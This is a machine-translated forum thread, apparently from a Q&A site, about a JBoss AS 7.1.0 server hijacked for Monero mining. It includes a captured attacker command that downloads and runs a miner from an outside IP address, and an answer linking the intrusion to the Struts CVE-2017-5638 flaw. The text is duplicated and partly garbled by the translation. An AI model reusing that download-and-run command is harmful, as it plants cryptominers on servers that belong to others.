JBoss AS 7.1.0 最终可能的安全问题
JBoss AS 7.1.0 Final possible security issue
最近几天我在我的服务器上发现了一个可疑的 运行ning 进程。
jboss 23276 0.0 0.0 113108 644 ? S 04:25 0:00 /bin/bash -c cd /tmp; rm yam; pkill -9 yam; pkill -9 minergate-cli;curl -ks http://107.155.106.174/t/5tf-1478613950.txt > yam || (wget https://107.155.106.174/t/5tf-1478613950.txt --no-check-certifica
jboss 23277 374 0.1 424456 35600 ? Sl 04:25 2880:22 ./yam --mining-params xmr:av=0&donation-interval=50 -c x -M stratum+tcp://dxzgadfgsdfgsdfgsdfgsdfgwerjukQdysdddRFch2CGykmqWUJPJW2hf23AaJWXmEPe96xYyYVDGn7qN:x@xmr-usa.dwarfpool.com:9050/
我在网上搜索了一下,好像有人用我的服务器作为计算节点来挖比特币。所以有人设法在我的服务器上上传并 运行 这个。据我所知,无法访问密码,只能在 Linux 用户 jboss 上执行此操作,我的 jboss 应用程序也在 运行ning 下这个用户。
作为一个快速解决方案,我在 tmp 文件夹中创建了一个与 root 同名的文件,这样它就无法覆盖它。而且我还在 运行ning 一个脚本来每分钟检查一个包含其中一些进程参数的进程是否 运行ning.
我想找到这个问题的根源。 jboss 管理控制台已停用。
顺便说一句:我的服务器 运行 Centos 7 和 java 版本“1.7.0_79”。
可能您遇到的问题与我们在服务器上遇到的问题相同。
这是关于 Apache Struts 中的漏洞,看看这个 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638 and this https://cwiki.apache.org/confluence/display/WW/S2-045
在我们的案例中,有人正在挖掘并试图获取有关操作系统的一些信息(SSH 版本、Os 系列、用户等)。幸运的是,我们是 运行 专用帐户下的应用程序,没有任何 public 访问端口(攻击滥用代理应用程序)。但是你应该检查一些日志并查看一些 "multipart/form-data"(在我们的例子中)
grep -r -ni 'multipart/form-data'
最近几天我在我的服务器上发现了一个可疑的 运行ning 进程。
jboss 23276 0.0 0.0 113108 644 ? S 04:25 0:00 /bin/bash -c cd /tmp; rm yam; pkill -9 yam; pkill -9 minergate-cli;curl -ks http://107.155.106.174/t/5tf-1478613950.txt > yam || (wget https://107.155.106.174/t/5tf-1478613950.txt --no-check-certifica
jboss 23277 374 0.1 424456 35600 ? Sl 04:25 2880:22 ./yam --mining-params xmr:av=0&donation-interval=50 -c x -M stratum+tcp://dxzgadfgsdfgsdfgsdfgsdfgwerjukQdysdddRFch2CGykmqWUJPJW2hf23AaJWXmEPe96xYyYVDGn7qN:x@xmr-usa.dwarfpool.com:9050/
我在网上搜索了一下,好像有人用我的服务器作为计算节点来挖比特币。所以有人设法在我的服务器上上传并 运行 这个。据我所知,无法访问密码,只能在 Linux 用户 jboss 上执行此操作,我的 jboss 应用程序也在 运行ning 下这个用户。
作为一个快速解决方案,我在 tmp 文件夹中创建了一个与 root 同名的文件,这样它就无法覆盖它。而且我还在 运行ning 一个脚本来每分钟检查一个包含其中一些进程参数的进程是否 运行ning.
我想找到这个问题的根源。 jboss 管理控制台已停用。
顺便说一句:我的服务器 运行 Centos 7 和 java 版本“1.7.0_79”。
可能您遇到的问题与我们在服务器上遇到的问题相同。
这是关于 Apache Struts 中的漏洞,看看这个 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638 and this https://cwiki.apache.org/confluence/display/WW/S2-045
在我们的案例中,有人正在挖掘并试图获取有关操作系统的一些信息(SSH 版本、Os 系列、用户等)。幸运的是,我们是 运行 专用帐户下的应用程序,没有任何 public 访问端口(攻击滥用代理应用程序)。但是你应该检查一些日志并查看一些 "multipart/form-data"(在我们的例子中)
grep -r -ni 'multipart/form-data'